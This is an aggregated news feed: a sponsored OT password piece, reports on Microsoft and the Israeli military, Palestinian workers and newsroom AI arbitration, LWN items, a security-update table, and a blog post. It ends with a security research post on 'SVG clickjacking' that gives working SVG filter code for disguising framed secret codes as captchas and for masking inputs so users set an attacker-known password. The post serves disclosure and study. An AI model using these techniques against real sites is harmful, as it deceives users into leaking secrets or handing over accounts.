Likewise, segmentation and network access controls are important, ensuring that only the right devices (and people) can access designated areas, and that any damage is limited should the worst-case scenario become a reality.

Continuous password protection in OT

Although such security approaches have clear benefits, one thing is clear, poor password security will hugely increase your vulnerability to cyberattack, with potentially serious consequences.

This means it is vital to develop a clear picture of the password security landscape across an OT environment. Specops Password Policy provides this capability. The simple-to-use tool continuously scans for over 4.5 billion compromised passwords in Active Directory, while also blocking users from creating weak passwords in the first place. Book a free trial today .

OT systems interact with some of the most important infrastructure in industry and society, with serious consequences if things go wrong. Robust password security is the cornerstone of resilient OT environments, protecting people and assets for the long term.

Sponsored and written by Specops Software .

Show HN: OnlyRecipe 2.0 – I added all features HN requested – 4 years later

Hacker News
onlyrecipeapp.com
2025-12-04 15:06:08
Comments...
Original Article

OnlyRecipe

Loading...

Irish authorities asked to investigate Microsoft over alleged unlawful data processing by IDF

Guardian
www.theguardian.com
2025-12-04 14:59:39
Move follows Guardian revelations of Israel’s mass surveillance of Palestinians using Microsoft cloud Irish authorities have been formally asked to investigate Microsoft over alleged unlawful data processing by the Israeli Defense Forces. The complaint has been made by the human rights group the Iri...
Original Article

Irish authorities have been formally asked to investigate Microsoft over alleged unlawful data processing by the Israeli Defense Forces.

The complaint has been made by the human rights group the Irish Council for Civil Liberties (ICCL) to the Data Protection Commission, which has legal responsibility in Europe for overseeing all data processing in the European Union.

It follows revelations in August by the Guardian with the Israeli-Palestinian publication +972 Magazine and the Hebrew outlet Local Call that a giant trove of Palestinians’ phone calls was being stored on Microsoft’s cloud service, Azure, as part of a mass surveillance operation by the Israeli military.

The ICCL alleges that the processing of the personal data “facilitated war crimes, crimes against humanity, and genocide by Israeli military”. Microsoft’s European headquarters are located in Ireland .

Joe O’Brien, the executive director of ICCL, said: “Microsoft’s technology has put millions of Palestinians in danger. These are not abstract data-protection failures.”

He said that the cloud services “enabled real-world violence” and it was “essential that the DPC move quickly and decisively” in view of the “threat to life posed by the issues at the heart of this complaint”.

He added: “When EU infrastructure is used to enable surveillance and targeting, the Irish Data Protection Commission must step in – and it must use its full powers to hold Microsoft to account.”

A cache of leaked documents reviewed by the Guardian revealed that Unit 8200, the Israeli military’s spy agency, had opened talks as far back as 2021 to move vast amounts of top secret intelligence material to the US company’s cloud service.

The documents showed how Microsoft’s storage facility had been used by Unit 8200 to store an expansive archive of everyday Palestinian communications, facilitating targeted airstrikes and other military operations.

In response to the revelations Microsoft ordered an urgent external inquiry to review its relationship with Unit 8200. Its initial findings led the company to cancel the unit’s access to some of its cloud storage and AI services.

ICCL claims that Microsoft facilitated critical components of Israel’s military surveillance “Al Minasseq” system.

It says the alleged “removal” of the records of intercepted phone calls from EU servers to Israel obscured evidence of illegal processing before investigations could commence within the EU and claims that unlawful processing was a breach of the EU’s general data protection regulation (GDPR) governing use of personal data.

Equipped with Azure’s near-limitless storage capacity and computing power, Unit 8200 had built an indiscriminate system allowing its intelligence officers to collect, play back and analyse the content of cellular calls of an entire population.

A spokesperson for the DPC said: “I can confirm that the DPC has received a complaint and it is currently under assessment.”

Microsoft has been approached for comment.

Ben Hutchings: FOSS activity in November 2025

PlanetDebian
www.decadent.org.uk
2025-12-04 14:59:13
Debian packages: debian-cd: Bugs: replied to #1120055: Please include ifenslave, vlan and possibly bridge-utils to netinst CD firmware-nonfree: Bugs: ...
Original Article

Better living through software

Ben Hutchings's diary of life and technology

News, Not Slop

Portside
portside.org
2025-12-04 14:55:07
News, Not Slop Kurt Stand Thu, 12/04/2025 - 09:55 ...
Original Article
News, Not Slop Published

The NewsGuild-CWA has launched News, Not Slop, a campaign to call for accountability in the use of generative AI in newsrooms. | Photo: NewsGuild-CWA

Politico and E&E News journalists announced a major victory in arbitration this week, successfully arguing that Politico management violated the workers’ collective bargaining agreement by unilaterally introducing two artificial intelligence tools for news coverage without providing notice or bargaining over their implementation. Per the workers’ union–the PEN Guild, part of the Washington-Baltimore NewsGuild-CWA–it’s one of the first major arbitration cases concerning AI practices in journalism, setting a powerful precedent.

“This ruling is a clear affirmation that AI cannot be deployed as a shortcut around union rights, ethical journalism, or human judgment,” Unit Chair Ariel Wittenberg said in a statement. “This is a win for our members at POLITICO fighting to ensure that AI strengthens our newsroom rather than undermining it.”

Politico and E&E News journalists secured contract language governing how AI tools could be implemented in their first contract. Those collectively-bargained protections require the employer to give 60 days notice before introducing AI tools that substantially impact work or could lead to layoffs, engage in good-faith bargaining concerning those tools, ensure the tools meet Politico’s ethical standards, and require human oversight. The arbitrator ruled that management violated these contract terms twice, through AI-created live summaries of news with factual and style-book errors and an AI Report Builder that created inaccurate reports, citing journalists’ work, lacked any human review, and was riddled with errors. In both instances, management failed to notify the union or bargain over implementation of these tools.

“This ruling affirms that employers cannot use emerging technology as an end-run around contractual obligations,” said Amos Laor, Washington-Baltimore News Guild General Counsel in a statement. “AI tools may be new, but the legal principles we secured in the agreement are not: management must provide notice, bargain with the union, and ensure that innovation does not come at the expense of workers’ rights or diminish their work. For journalists, issues of journalistic integrity are directly tied to their reputation, relationship with readers, and ability to perform their duties, and we view the protection of newsroom ethical standards as an integral part of their labor rights.”

The proliferation of AI slop — poor quality, inaccurate, misleading or just plain weird media — is a growing concern for both creative workers and the general public, from newspaper readers to TikTok users. It’s impacts are far-reaching, with the generative tech used to spread misinformation or heighten division , raising broad concerns about reliability and ethics.

“This decision makes it clear that unionized journalists are the ones fighting for accurate news when companies roll out AI spreading misinformation,” said NewsGuild-CWA President Jon Schleuss. “Journalists, by unionizing and demanding quality for their readers, are negotiating stronger ethics, accountability and actual humans producing the news. This ruling is a strong message to every media boss: AI must be implemented responsibly, transparently and through negotiation with journalists.”

Now, NewsGuild-CWA journalists have launched a campaign — News, Not Slop — calling for common-sense protections around artificial intelligence in media, fighting to ensure that AI slop and misinformation doesn’t erode the integrity and reliability of the news coverage we all rely on.

Supporters of ethical, human-made journalism can join the fight by signing their name to a petition targeting newsroom editors across North America.

Israel Revoked a Palestinian’s Work Permit. When He Tried to Cross the Wall, They Shot Him and Left Him to Die.

Intercept
theintercept.com
2025-12-04 14:48:59
Before October 7, Palestinian laborers would cross into Israel for jobs. Then Israel revoked work permits and unleashed a violent crackdown. The post Israel Revoked a Palestinian’s Work Permit. When He Tried to Cross the Wall, They Shot Him and Left Him to Die. appeared first on The Intercept....
Original Article

For many years, Arafat Qaddous worked construction jobs in Israel.

He was one of around 130,000 Palestinians living in the occupied West Bank with permits from the Israeli authorities to cross the separation wall into Israeli territory as a laborer. With his lawful employment inside the Green Line, which separates the West Bank from Israel, he was able to go back and forth from his hometown of Iraq Burin, near Nablus in the north, to whichever Israeli city offered work.

Before the Covid pandemic, the 51-year-old Qaddous’s work in Israel sustained his wife and five children.

His brother Qusai said Arafat’s living conditions worsened over the years, as work opportunities dried up during the pandemic, his family’s needs grew, and the West Bank’s economy tanked.

“My brother risked his life because he needed to provide for his family.”

“There are hardly any jobs in the West Bank,” Qusai said, “and prices of food and goods are extremely high.”

Things got even worse after October 7, 2023: Israel indefinitely paused Palestinian workers’ permits after Hamas’s attack, and Qaddous lost his permit. So when an opportunity presented itself — a job in Taybeh, inside Israel — he took a chance.

“My brother risked his life because he needed to provide for his family at a time when the economic situation was difficult,” Qusai said.

The decision to cross the wall would prove deadly for Qaddous.

On April 26, 2024, Qaddous drove to the barrier. Capped with barbed wire, the wall is over 8 meters tall and runs more than 200 kilometers. Qaddous hoped to jump over it and catch a ride from East Jerusalem to Taybeh. He chose a section of the barrier that separates the Palestinian side of the town of Al-Ram from the Israeli section.

Qaddous paid some local Palestinian men 600 shekels, or $186. The men provided the ladder for getting up the wall, a rope for getting down the other side, and transport to the job site, The men served as lookouts throughout the crossing.

Qaddous climbed the ladder, then mayhem broke out. The lookouts spotted an Israeli police jeep. Qaddous fell to the ground.

“The fall did not kill him immediately,” Qusai said. “Israeli police spotted him as he lay on the ground with a serious head injury and prevented an ambulance from reaching him. He bled out. When they were sure he was dead, they allowed paramedics to take his body.”

Shooting Workers

Forty-four Palestinian workers have died trying to cross the wall since October 2023, when Israeli authorities revoked almost all permits, according to the Palestinian Workers’ Union. The deaths, along with serious injuries inflicted by authorities, happened while workers were being chased by Israeli police, beaten, shot at, or fell after jumping off the separation barrier.

The injuries have been growing more serious. Palestinians are increasingly being shot by Israel’s border police, especially in the legs, following an order from far-right Israeli Minister of National Security Itamar Ben-Gvir, according to the Israeli news outlet Walla . Since the start of 2025, at least 106 Palestinians have been shot in the legs by border police at the Israeli separation wall near Jerusalem — including one this week who was shot in the leg when Israeli forces opened fire, according to the Red Crescent.

Israel’s occupation has shaped the West Bank’s economy for nearly six decades, creating a structure in which Palestinians are largely prevented from building a self-sustaining economy and instead pushed into dependency on work in Israel itself or in its illegal settlements.

Before the Gaza genocide got underway in October 2023, almost 20 percent all Palestinian laborers worked in Israel and or its illegal West Bank settlements — mostly in construction and agriculture. That number nosedived to 4 percent immediately after the Hamas-led attack on Israel set off an Israeli onslaught.

Before October 2023, around a quarter million Palestinians, with and without permits, used to commute daily from the Occupied Palestinian Territories, including 19,000 from Gaza, according to Shaher Saad, the secretary-general of the Palestinian Workers’ Union.

Today, fewer than 15,000 Palestinian laborers with permits travel to Israel for work with permits. The drastic reduction cut off a vital liquidity lifeline that provided them with wages 4 to 10 times higher than what they would earn in the occupied territories, where unemployment is more than 50 percent nationally — about 80 percent in Gaza and 35 percent in the West Bank.

Additionally, since October 2023, Israel has staunched the flow of tax revenue to the Palestinian Authority, the home-rule Palestinian government in the West Bank. Israel has withheld and delayed transfers of the revenues back to the Palestinians in contravention of the Oslo Accords, the diplomatic agreement that established the PA and set the stage for a two-state solution whose prospects have all but vanished.

With public salaries hit by the withheld tax revenue and cash running increasingly short, about 40,000 Palestinians with no permits continue to cross into Israel illegally, despite the increased risk of the Israeli crackdown, according to Saad.

For years, Israel has regarded Palestinians — many of whom work in low-skilled positions — as a pool of cheap labor.

Bringing them into the Israeli labor market was presented as a way to boost Palestinian living standards, on the assumption that hardship breeds resistance. Economic gains and financial reliance on Israel, on the other hand, would deter Palestinians from challenging the status quo, helping maintain Israeli dominance.

A structure was created wherein any worker can easily be replaced by the thousands desperate for permits.

At the same time, however, Palestinian workers were far from equal in the workforce. With no guaranteed sick leave, no pension, delayed or denied benefits, and with work permits tied to a specific employer, a structure was created wherein any worker can easily be replaced by the thousands desperate for permits. Palestinian laborers were cheap and disposable. And their mistreatment has worsened since October 7, according to Mohammad Blidi, who heads the workers’ union in Tulkarem, a Palestinian city near the separation wall in the northern West Bank.

“As an occupying power, Israel is legally obliged to provide work for Palestinians, and to respect international labor laws,” Blidi said. “What is happening in reality is far from it. On a daily basis, Palestinian workers are subject to humiliation and beatings.”

Laborers From Gaza

On the day of the October 7 attacks, Israel detained thousands of Palestinian workers from Gaza who were in working on permits inside Israel. Although they had the necessary Israeli-issued permission, they were held for a month at least, many beaten and interrogated.

That the detained workers were legally in Israel, with permits and the attendant security vetting, according to Blidi, suggests they were detained mainly because they had come from Gaza.

The arrests were carried out “ secretly and illegally ,” according to Gisha, an Israeli group that advocates for Palestinians’ right of movement. There was no legal basis for moving the workers into detention centers, the group said, and they were effectively disappeared, with Israel refusing to disclose the workers’ identities and whereabouts.

Many of the workers described being mistreated in detention — left without food, water, medication, a mattress, or toilet access. They endured harsh violence and psychological abuse, reporting torture and degrading treatment. Israeli soldiers seized all cash and mobile phones from the workers, and two died in Israeli custody.

In one case, a 40-year-old Palestinian man from Gaza City who worked in the Israeli city of Ashkelon on the day of the attack had to flee to Hebron when news came out that laborers from Gaza were being targeted by Israeli police.

Since he could not go back to Gaza, he hunkered down with several other workers in the southern West Bank city awaiting his fate, the man, who requested anonymity for fear of his safety, said in an interview. Then he received word that his pregnant wife and four of his children — two boys and two girls — had been killed in an Israeli airstrike in Gaza City. Only one child survived, but the boy’s leg was seriously injured and he lost an eye in the attack.

Just two days into mourning, the worker was awakened by a loud explosion in the pre-dawn hours. Israeli soldiers blew up the door to the house he was staying in and detained him, along with the others.

“They tied our hands behind our backs and blindfolded us before beating us,” he recalled. “They took us to the Israeli settlement of Kiryat Arba and from there to another prison that they didn’t disclose. For nine days, we endured tortuous interrogations. Every day, they asked different questions about Gaza. I told them I’m just a worker.”

He was once again transferred to another prison for a day — and in the dead of night, he and several other workers were dumped at the border with Gaza. They all entered the Strip by foot.

“I was in the south and couldn’t go back to Gaza City,” he said. “I couldn’t bury my wife and children. I couldn’t say goodbye to them.”

It took 20 days for him to be reunited with his son. They moved into a tattered tent that flooded with the recent winter storms.

He said that, working in Israel, he had been able to save over $10,000.

“It’s all gone now,” the man said. “I only have four shekels” — about $1 — “in my pocket. I used to be able to work and provide for my family. But now, there is no life.”

How to work with Product: Taste and Adjust

Lobsters
blog.nilenso.com
2025-12-04 14:43:45
Comments...
Original Article

Eh! All of you, come here! Taste it! Taste it! Taste it! Taste it!

Gordon Ramsay

If you want to cook a great dish, you’ve got to taste it every step of the way. Taste the ingredients you buy, the components you prepare, and the spices and seasonings. If you can’t taste it, you smell it, feel it, or listen to it. And then you adjust. Taste and adjust until you create a dish you like.

“Taste and adjust” is a form of continuous improvement applied to the creation of food. The hallmark methodologies of the scientific method , Kaizen , TPS , PDCA , TDD , design sprints , or extreme programming , that have led to some of humanity’s best creations, are all forms of continuous improvement. At their core is this principle:

Creators need an immediate connection to what they’re creating.

Bret Victor, Inventing on Principle

Bret Victor says that “working in the head doesn’t scale” , and that understanding comes from seeing data, flow, and state directly . When building products, can you see the data, flow, and state directly? Can you “taste” your product every step to ensure it’s exactly what you and your users want?

The chef’s line-tasting, our flywheel, harness, environment, or feedback loop, is the framework in which we apply this principle to product creation. The product and engineering functions must build and maintain this flywheel together, every step of the way.

taste-and-adjust

The product development flywheel

To build the flywheel, we ask:

  • “What is the simplest experiment I can run to validate this hypothesis?”, and then
  • “What do I need to run this experiment?”

The machinery that enables running such experiments frequently and quickly is the flywheel.

It could be in the form of an operator’s console that allows product to tweak config on the fly, or building a prototype, or a feature-flag allowing tests with beta-users, or publishing a new metric that removes a blind spot. Even unit tests that verify whether the code does what product intends are part of this flywheel.

While this seems like a simple enough principle to apply, in reality, we are faced with the inherent complexity of working with many people, roles, and tools. A typical product development lifecycle (PDLC) looks like the abstract machine shown below. Each phase has controls and measurements around specific feedback loops (such as Idea ⇄ User), and the phases are interconnected through reinforcing and balancing information channels.

product-development-flywheel

Here’s a list of some ways to “taste” at each phase, and a healthy level of involvement of product and engineering in each of them.

Phase Feedback Loop Feedback tools (ways to taste, smell, or touch) Healthy involvement %
1. Explore Idea ⇄ User Pen + Paper, User Research, Design Sprints, Landing Pages, Campaigns 90% Product,
10% Engineering
2. Validate Hypothesis ⇄ User Wireframes, Prototypes, Proofs of Concept 70% Product,
30% Engineering
3. Plan Idea ⇄ Spec Thin slices of work, Experiments, Spikes, Tracing Bullets 50% Product,
50% Engineering
4. Develop Spec ⇄ Code TDD, Types, Compilation, REPL, AI Assisted Coding 10% Product,
90% Engineering
5. Integrate and release Code ⇄ Product Previews, Devboxes, Staging, Integration, Quality Analysis 30% Product,
70% Engineering
6. Operate Product ⇄ User Product Observability, Operator Consoles, Alerts 50% Product,
50% Engineering

Fine-Tuning the Flywheel

  • Get end-to-end product builders: You want teams that go together from phase 1 to 6, and then around again, to close the loop on their creation. Look for roles siloed in fewer phases, and work to involve them in all phases.
  • Get involved early: Phases 1 and 2 are the ideation phase, and the most important thing to do here is to listen, and understand the problem deeply. I wrote about this earlier in the series . Building this phase of the flywheel for new products is cheap, especially with vibe coding. However, keeping experimentation costs low as the product matures can be challenging. Work to keep experiments cheap by using feature flags, or by maintaining experimental or forked versions of applications.
  • Get closer to the user: Phases 3, 4, and 5 make up the typical SDLC (software development lifecycle), and in my experience, engineering is less involved in phases 1, 2 and 6. This is unfortunate because phases 1, 2, and 6 interface with the user and house the most important feedback loops.
  • Planning > Speed: Development (phase 4) is arguably the most expensive part of most tech companies. While there’s a lot of focus on making development faster to reduce costs, reducing work through planning (phase 3) is far more effective. Break down problems, find thin slices of work to serve, and prioritise ruthlessly.
  • Close outer feedback loops: Phase 6 should close the loop on business goals through product observability, in addition to the local feedback loops of individual features or initiatives.

**Stronger flywheel ⇒ Immediate connection ⇒ Better product**

So, review your flywheel periodically. Lubricate the gears, and tighten the feedback loops. Ultimately, ensure that everyone on the team feels empowered to stop the line, take a spoonful, and say, “Needs more salt.”

The NYPD Ignored NYC's Sanctuary Laws

hellgate
hellgatenyc.com
2025-12-04 14:42:39
And more links to start your day....
Original Article

Great! You’ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to Hell Gate.

Your link has expired.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.

[$] A "frozen" dictionary for Python

Linux Weekly News
lwn.net
2025-12-04 14:42:12
Dictionaries are ubiquitous in Python code; they are the data structure of choice for a wide variety of tasks. But dictionaries are mutable, which makes them problematic for sharing data in concurrent code. Python has added various concurrency features to the language over the last decade or so—as...
Original Article

The page you have tried to view ( A "frozen" dictionary for Python ) is currently available to LWN subscribers only.

Reader subscriptions are a necessary way to fund the continued existence of LWN and the quality of its content.

If you are already an LWN.net subscriber, please log in with the form below to read this content.

Please consider subscribing to LWN . An LWN subscription provides numerous benefits, including access to restricted content and the warm feeling of knowing that you are helping to keep LWN alive.

(Alternatively, this item will become freely available on December 18, 2025)

cmocka 2.0 released

Linux Weekly News
lwn.net
2025-12-04 14:09:54
Andreas Schneider has announced version 2.0 of the cmocka unit-testing framework for C: This release represents a major modernization effort, bringing cmocka firmly into the "modern" C99 era while maintaining the simplicity and ease of use that users have come to expect. One of the most significa...
Original Article

Andreas Schneider has announced version 2.0 of the cmocka unit-testing framework for C:

This release represents a major modernization effort, bringing cmocka firmly into the "modern" C99 era while maintaining the simplicity and ease of use that users have come to expect.

One of the most significant changes in cmocka 2.0 is the migration to C99 standard integer types. The LargestIntegralType typedef has been replaced with intmax_t and uintmax_t from stdint .h, providing better type safety and portability across different platforms. Additionally, we've adopted the bool type where appropriate, making the code more expressive and self-documenting.

Using intmax_t and uintmax_t also allows to print better error messages. So you can now find e.g. assert_int_equal and assert_uint_equal .

cmocka 2.0 introduces a comprehensive set of type-specific assertion macros, including `assert_uint_equal()`, `assert_float_equal()`, and enhanced pointer assertions. The mocking system has also been significantly improved with type-specific macros like `will_return_int()` and `will_return_float()`. The same for parameter checking etc.

LWN covered the project early in its development in 2013. See the full list of new features, enhancements, and bug fixes in cmocka 2.0 in the changelog .



Security updates for Thursday

Linux Weekly News
lwn.net
2025-12-04 14:07:15
Security updates have been issued by AlmaLinux (expat and libxml2), Debian (openvpn and webkit2gtk), Fedora (gi-loadouts, kf6-kcoreaddons, kf6-kguiaddons, kf6-kjobwidgets, kf6-knotifications, kf6-kstatusnotifieritem, kf6-kunitconversion, kf6-kwidgetsaddons, kf6-kxmlgui, nanovna-saver, persepolis, py...
Original Article
Dist. ID Release Package Date
AlmaLinux ALSA-2025:22175 9 expat 2025-12-03
AlmaLinux ALSA-2025:22376 9 libxml2 2025-12-03
Debian DSA-6069-1 stable openvpn 2025-12-03
Debian DLA-4394-1 LTS webkit2gtk 2025-12-04
Debian DSA-6070-1 stable webkit2gtk 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 gi-loadouts 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kcoreaddons 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kguiaddons 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kjobwidgets 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-knotifications 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kstatusnotifieritem 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kunitconversion 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kwidgetsaddons 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kxmlgui 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 nanovna-saver 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 persepolis 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 python-ezdxf 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 python-pyside6 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 sigil 2025-12-04
Fedora FEDORA-2025-7ea43a29f2 F42 stb 2025-12-04
Fedora FEDORA-2025-55bbd18c79 F43 stb 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 syncplay 2025-12-04
Fedora FEDORA-2025-72fbf180c7 F43 tinyproxy 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 torbrowser-launcher 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 ubertooth 2025-12-04
Fedora FEDORA-2025-073e4f7991 F42 usd 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 usd 2025-12-04
Mageia MGASA-2025-0315 9 cups 2025-12-03
SUSE openSUSE-SU-2025:0458-1 osB15 Security 2025-12-04
SUSE SUSE-SU-2025:4319-1 SLE15 SLE-m5.2 SLE-m5.3 SLE-m5.4 SLE-m5.5 oS15.6 cups 2025-12-03
SUSE openSUSE-SU-2025:15793-1 TW gegl 2025-12-03
SUSE openSUSE-SU-2025:0457-1 osB15 icinga2 2025-12-04
SUSE openSUSE-SU-2025-20135-1 oS16.0 mozjs128 2025-12-04
Ubuntu USN-7904-1 16.04 18.04 20.04 ghostscript 2025-12-03
Ubuntu USN-7911-1 14.04 kernel 2025-12-04
Ubuntu USN-7909-1 20.04 22.04 linux, linux-aws, linux-aws-5.15, linux-gcp-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle, linux-oracle-5.15, linux-xilinx-zynqmp 2025-12-04
Ubuntu USN-7907-1 16.04 18.04 linux, linux-aws, linux-aws-hwe, linux-kvm, linux-oracle 2025-12-03
Ubuntu USN-7909-3 22.04 linux-aws-fips, linux-fips, linux-gcp-fips 2025-12-04
Ubuntu USN-7907-2 18.04 linux-aws-fips, linux-fips 2025-12-03
Ubuntu USN-7910-1 22.04 linux-azure-fips 2025-12-04
Ubuntu USN-7907-3 16.04 18.04 linux-gcp, linux-gcp-4.15, linux-hwe 2025-12-04
Ubuntu USN-7889-4 22.04 24.04 linux-gcp, linux-gcp-6.8, linux-gke, linux-gkeop 2025-12-04
Ubuntu USN-7879-4 24.04 25.04 linux-gcp-6.14, linux-raspi 2025-12-04
Ubuntu USN-7907-4 18.04 linux-gcp-fips 2025-12-04
Ubuntu USN-7909-2 22.04 linux-intel-iot-realtime, linux-realtime 2025-12-04
Ubuntu USN-7861-5 24.04 linux-raspi, linux-raspi-realtime, linux-xilinx 2025-12-03
Ubuntu USN-7908-1 22.04 24.04 25.04 25.10 postgresql-14, postgresql-16, postgresql-17 2025-12-03

SVG Filters - Clickjacking 2.0

Lobsters
lyra.horse
2025-12-04 14:04:13
Comments...
Original Article

Clickjacking is a classic attack that consists of covering up an iframe of some other website in an attempt to trick the user into unintentionally interacting with it. It works great if you need to trick someone into pressing a button or two, but for anything more complicated it’s kind of unrealistic.

I’ve discovered a new technique that turns classic clickjacking on its head and enables the creation of complex interactive clickjacking attacks, as well as multiple forms of data exfiltration.

I call this technique “ SVG clickjacking ”.

Liquid SVGs

The day Apple announced its new Liquid Glass redesign was pretty chaotic. You couldn’t go on social media without every other post being about the new design, whether it was critique over how inaccessible it seemed, or awe at how realistic the refraction effects were.

Drowning in the flurry of posts, a thought came to mind - how hard would it be to re-create this effect? Could I do this, on the web, without resorting to canvas and shaders? I got to work, and about an hour later I had a pretty accurate CSS/SVG recreation of the effect 1 .

EMERGENCY!

Girls Rituals

This Won't Be The Last Time

acloudyskye

SOUND BANDIT FUCKING LIVES

Sound Bandit

Love & Ponystep

Vylet Pony

I Love My Computer

Ninajirachi

You can drag around the effect with the bottom-right circle control thing in the demo above (chrome/firefox desktop, chrome mobile).

Note: This demo is broken in Safari, sorry.

My little tech demo made quite a splash online, and even resulted in a news article with what is probably the wildest quote about me to date: “Samsung and others have nothing on her” .

A few days passed, and another thought came to mind - would this SVG effect work on top of an iframe?

Like, surely not? The way the effect “refracts light” 2 is way too complex to work on a cross-origin document.

But, to my surprise, it did.

The reason this was so interesting to me is that my liquid glass effect uses the feColorMatrix and feDisplacementMap SVG filters - changing the colors of pixels, and moving them, respectively. And I could do that on a cross-origin document?

This got me wondering - do any of the other filters work on iframes, and could we turn that into an attack somehow? It turns out that it’s all of them, and yes!

Building blocks

I got to work, going through every <fe*> SVG element and figuring out which ones can be combined to build our own attack primitives.

These filter elements take in one or more input images, apply operations to them, and output a new image. You can chain a bunch of them together within a single SVG filter, and refer to the output of any of the previous filter elements in the chain.

Let’s take a look at some of the more useful base elements we can play with:

That’s quite a selection of utilities!

If you’re a demoscener 3 you’re probably feeling right at home. These are the fundamental building blocks for many kinds of computer graphics, and they can be combined into many useful primitives of our own. So let’s see some examples.

Fake captcha

I’ll start off with an example of basic data exfiltration. Suppose you’re targeting an iframe that contains some sort of sensitive code. You could ask the user to retype it by itself, but that’d probably seem suspicious.

What we can do instead is make use of feDisplacementMap to make the text seem like a captcha! This way, the user is far more likely to retype the code.

Here is your secret code:

6c79 7261 706f 6e79

Don't share it with anyone!

Here is your secret code:

6c79 7261 706f 6e79

Don't share it with anyone!

Complete a captcha

What's written above?

Good girl!!

( tap click to edit it you're not a girl)

<iframe src="..." style="filter:url(#captchaFilter)"></iframe>
<svg width="768" height="768" viewBox="0 0 768 768" xmlns="http://www.w3.org/2000/svg">
  <filter id="captchaFilter">
    <feTurbulence
      type="turbulence"
      baseFrequency="0.03"
      numOctaves="4"
      result="turbulence" />
    <feDisplacementMap
      in="SourceGraphic"
      in2="turbulence"
      scale="6"
      xChannelSelector="R"
      yChannelSelector="G" />
  </filter>
</svg>

Note: Only the part inside the <filter> block is relevant, the rest is just an example of using filters.

Add to this some color effects and random lines , and you’ve got a pretty convincing cap - tcha!

Out of all the attack primitives I’ll be sharing, this one is probably the least useful as sites rarely allow you to frame pages giving out magic secret codes. I wanted to show it though, as it’s a pretty simple introduction to the attack technique.

)]}' [[1337],[1,"AIzaSyAtbm8sIHRoaXMgaXNuJ3QgcmVhbCBsb2w",0,"a",30],[768972,768973,768932,768984,768972,768969,768982,768969,768932,768958,768951],[105,1752133733,7958389,435644166009,7628901,32481100117144691,28526,28025,1651273575,15411]]

Still, it could come in handy because often times you’re allowed to frame read-only API endpoints, so maybe there’s an attack there to discover.

Grey text hiding

The next example is for situations where you want to trick someone into, for example, interacting with a text input. Oftentimes the inputs have stuff like grey placeholder text in them, so showing the input box by itself won’t cut it.

Let’s take a look at our example target (try typing in the box).

Set a new p​assword

too short

In this example we want to trick the user into setting an attacker-known password, so we want them to be able to see the text they’re entering, but not the grey placeholder text, nor the red “too short” text.

Let’s start off by using feComposite with arithmetics to make the grey text disappear. The arithmetic operation takes in two images, i1 ( in=... ) and i2 ( in2=... ), and lets us do per-pixel maths with k1 , k2 , k3 , k4 as the arguments according to this formula: r = k 1 i 1 i 2 + k 2 i 1 + k 3 i 2 + k 4 4 .

Set a new p​assword

too short

<feComposite operator=arithmetic
             k1=0 k2=4 k3=0 k4=0 />

Tip! You can leave out the in/in2 parameters if you just want it to be the previous output.

It’s getting there - by multiplying the brightness of the input we’ve made the grey text disappear, but now the black text looks a little suspicious and hard to read, especially on 1x scaling displays.

We could play around with the arguments to find the perfect balance between hiding the grey text and showing the black one, but ideally we’d still have the black text look the way usually does, just without any grey text. Is that possible?

So here’s where a really cool technique comes into play - masking. We’re going to create a matte to “cut out” the black text and cover up everything else. It’s going to take us quite a few steps to get to the desired result, so lets go through it bit-by-bit.

We start off by cropping the result of our black text filter with feTile .

Set a new p​assword

too short

<feTile x=20 y=56 width=184 height=22 />

Note: Safari seems to be having some trouble with feTile , so if the examples flicker or look blank, read this post in a browser such as Firefox or Chrome. If you're writing an attack for Safari, you can also achieve cropping by making a luma matte with feFlood and then applying it.

Then we use feMorphology to increase the thickness of the text.

Set a new p​assword

too short

<feMorphology operator=erode radius=3 result=thick />

Now we have to increase the contrast of the mask. I’m going to do it by first using feFlood to create a solid white image, which we can then feBlend with difference to invert our mask. And then we can use feComposite to multiply 5 the mask for better contrast.

Set a new p​assword

too short

<feFlood flood-color=#FFF result=white />
<feBlend mode=difference in=thick in2=white />
<feComposite operator=arithmetic k2=100 />

We have a luma matte now! All that’s left is to convert it into an alpha matte with feColorMatrix , apply it to the source image with feComposite , and make the background white with feBlend .

Set a new p​assword

too short

<feColorMatrix type=matrix
        values="0 0 0 0 0
                0 0 0 0 0
                0 0 0 0 0
                0 0 1 0 0" />
<feComposite in=SourceGraphic operator=in />
<feBlend in2=white />

Looks pretty good, doesn’t it! If you empty out the box (try it!) you might notice some artifacts that give away what we’ve done, but apart from that it’s a pretty good way to sort of sculpt and form various inputs around a bit for an attack.

There are all sorts of other effects you can add to make the input seem just right. Let’s combine everything together into a complete example of an attack.

Set a new p​assword

too short

Enter your e-mail address:

<filter>
  <feComposite operator=arithmetic
               k1=0 k2=4 k3=0 k4=0 />
  <feTile x=20 y=56 width=184 height=22 />
  <feMorphology operator=erode radius=3 result=thick />
  <feFlood flood-color=#FFF result=white />
  <feBlend mode=difference in=thick in2=white />
  <feComposite operator=arithmetic k2=100 />
  <feColorMatrix type=matrix
      values="0 0 0 0 0
              0 0 0 0 0
              0 0 0 0 0
              0 0 1 0 0" />
  <feComposite in=SourceGraphic operator=in />
  <feTile x=21 y=57 width=182 height=20 />
